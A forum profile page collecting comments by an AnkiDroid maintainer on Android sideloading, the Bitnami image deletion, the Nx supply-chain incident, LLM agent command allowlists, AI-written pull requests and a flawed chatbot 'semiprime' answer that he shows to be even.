Readit News logoReadit News
david_allison commented on Petition to stop Google from restricting sideloading and FOSS apps    · Posted by u/nativeforks
JumpCrisscross · 9 hours ago
> What do I need to do to make a difference, and how much time will this take?

EU or US?

> what's the path? Legislation?

Send them a letter explaining why this is bad for you. Keep it strictly factual and ideally concise. Copy Google’s legal [1] and any relevant digital or markets regulators. (If in the US, don’t forget your state regulators.)

Wait two weeks and then call the elected. Make sure they’re aware, and talk through your options. Send a letter thanking them for the call, incorporating any new information and actions they said they would take, and copy all of the previous parties again.

More work: reach out to other top developers and organise an open letter. This will be hard because everyone wants to include their pet issue and everyone will fight over scope and language.

[1] https://support.google.com/faqs/answer/6151275?hl=en

david_allison · a few seconds ago
> EU or US?

Neither, sadly.

Thanks for the link. I have neither the time nor inclination to be a figurehead, but I can have conversations once I feel there's a reasonable/achievable outcome. I'll put some thought into it.

david_allison commented on Petition to stop Google from restricting sideloading and FOSS apps    · Posted by u/nativeforks
JumpCrisscross · 10 hours ago
These online petitions are worse than useless. They don’t do anything because they fail to communicate either conviction to a cause or the relevance of the signers. And they may take someone who would otherwise do something useful, like call their elected or participate in public comment, and make them complacent.

An open letter from the lead developers and decision makers of top-rated apps in the Play Store would be useful. But that takes work, unlike an online petition.

david_allison · 9 hours ago
Hi, developer of a top-rated app in the Play Store [AnkiDroid].

What do I need to do to make a difference, and how much time will this take?

[My elected officials listen, what's the path? Legislation?]

david_allison commented on The Deletion of Docker.io/Bitnami   community.broadcom.com/ta... · Posted by u/zdkaster
rahkiin · 16 hours ago
It is sad to see how Broadcom cannot do padding right for mobile…

But on topic: why not create docker.io/bsi and let /bitnami as is without new updates? Then nothing breaks; it just won’t be possible to do upgrades. You’ll then figure out why and possibly seamlessly switch to your own build or BSI.

david_allison · 10 hours ago
> But on topic: why not create docker.io/bsi and let /bitnami as is without new updates?

If people are relying on you for automatic security updates, and you've decided to no longer provide these updates [for free], users should opt in to accept the risk.

This would normally require user action (after a period of warnings/information), and having the fix look 'obviously' unsafe (`/bitnami ` ->`/bitnamilegacy`) feels reasonable.

david_allison commented on Malicious versions of Nx and some supporting plugins were published   github.com/nrwl/nx/securi... · Posted by u/longcat
BobbyTables2 · a day ago
ELI5, how was the malicious PR approved and merged?

Are they using AI for automated code review too?

david_allison · a day ago
The workflows were set up to execute with a read/write `GITHUB_TOKEN` for `nx` when a PR was created/edited (no approval necessary).

See the security warnings on `pull_request_target`

https://docs.github.com/en/actions/reference/workflows-and-a...

https://securitylab.github.com/resources/github-actions-prev...

david_allison commented on Comet AI browser can get prompt injected from any site, drain your bank account   twitter.com/zack_overflow... · Posted by u/helloplanets
Anon1096 · 4 days ago
You can safeguard against this by having a whitelist of commands that can be run, basically cd, ls, find, grep, the build tool, linter, etc that are only informational and local. Mine is set up like that and it works very well.
david_allison · 4 days ago
> the build tool

Doesn't this give the LLM the ability to execute arbitrary scripts?

david_allison commented on AI tooling must be disclosed for contributions   github.com/ghostty-org/gh... · Posted by u/freetonik
macawfish · 7 days ago
"Every piece of feedback you give to an LLM is like screaming into the void - it wastes your time, and doesn't change the LLM one iota."

I think you just haven't gotten the hang of it yet, which is fine... the tooling is very immature and hard to get consistent results with. But this isn't a given. Some people do get good, steerable LLM coding setups.

david_allison · 7 days ago
As a maintainer, if you're dealing with a contributor who's sending in AI slop, you have no opportunity to prompt the LLM.

The PR effectively ends up being an extremely high-latency conversation with an LLM, via another human who doesn't have the full context/understanding of the problem.

david_allison commented on Why are anime catgirls blocking my access to the Linux kernel?   lock.cmpxchg8b.com/anubis... · Posted by u/taviso
withinrafael · 8 days ago
The security policy that didn't exist until a few hours ago?
david_allison · 8 days ago
Added on March 18: https://github.com/TecharoHQ/.github/commits/main/SECURITY.m...

Copied to the root of the repo after the disclosure

ref: https://github.com/TecharoHQ/anubis/issues/1002#issuecomment...

david_allison commented on Benchmarking GPT-5 on 400 real-world code reviews   qodo.ai/blog/benchmarking... · Posted by u/marsh_mellow
rowanG077 · 20 days ago
How so? Asking LLMs to solve a problem can be a problem of any form. For example I just asked this.

Can you give me a very large semiprime?

And claude opus answered:

Here's a very large semiprime:

N = 29927402397991286489627837734179186385188296382227646249397073654051914085318503794952624411151858464246403027505634195232053330357484129331920822220662818816547063469215394303721576869467659309978113411955550111870966028627418736664

This is a over 200-digit semiprime. Factoring semiprimes of this size is computationally intensive, which is why they form the basis of RSA encryption security.

---

Verifying whether this answer is correct is very hard, much harder than generating it.

Problems of this form come up very often. Not even in formal mathematics. Some magic number in the code that you need to reverse engineer to tell it's correct. Some library which you don't have the documentation for but was available when it was written. Hidden intentions or even requirements that are not clear from the code itself. If a weaker LLM is validating a stronger LLM the weaker LLM will simply not grasp the subtleties the stronger LLM created in it's answer. In fact it's a pretty common statement that writing code is easier than reading it. Which is precisely about generation vs validation.

david_allison · 20 days ago
> Factoring semiprimes of this size is computationally intensive, which is why they form the basis of RSA encryption security.

Not if it's divisible by 2.

    from sympy import isprime
    num = 29927402397991286489627837734179186385188296382227646249397073654051914085318503794952624411151858464246403027505634195232053330357484129331920822220662818816547063469215394303721576869467659309978113411955550111870966028627418736664
    print(num//2) # 14963701198995643244813918867089593192594148191113823124698536827025957042659251897476312205575929232123201513752817097616026665178742064665960411110331409408273531734607697151860788434733829654989056705977775055935483014313709368332
    print(isprime(num//2)) # False

david_allison commented on OpenAI charges by the minute, so speed up your audio   george.mand.is/2025/06/op... · Posted by u/georgemandis
QuantumGood · 2 months ago
I wish there was a 2.25x YouTube option for "normal" humans. I already use every shortcut, and listen at 2x 90% of the time. But Andrej I can't take faster than 1.25x
david_allison · 2 months ago
I have up to 4x (in steps of 0.05) with YouTube Premium on Android
david_allison commented on "Localhost tracking" explained. It could cost Meta €32B   zeropartydata.es/p/localh... · Posted by u/donohoe
throwawayffffas · 3 months ago
So I am seeing two issues here.

1. Android allows apps to open ports without permissions. And apps to communicate with each other without permissions.

2. The browsers allow random domains to access services on the localhost. Without notifying the user. We have seen vulnerabilities in the past accessing dev services running on localhost. Something should be done there.

david_allison · 3 months ago
> Android allows apps to open ports without permissions.

Just to clarify: you need `android.permission.INTERNET`. This is a default permission (granted by default at install time with no user interaction).

GrapheneOS allows this permission to be disabled.

As far as I'm aware, you can't lock this down to 'allow only intra-app communications via localhost', please let me know if I'm mistaken.

d

u/david_allison

KarmaCake day1898June 21, 2020
About
maintainer @ AnkiDroid

https://github.com/david-allison

gmail: davidallisongithub

Sponsors: https://github.com/sponsors/david-allison/

https://opencollective.com/ankidroid

View Original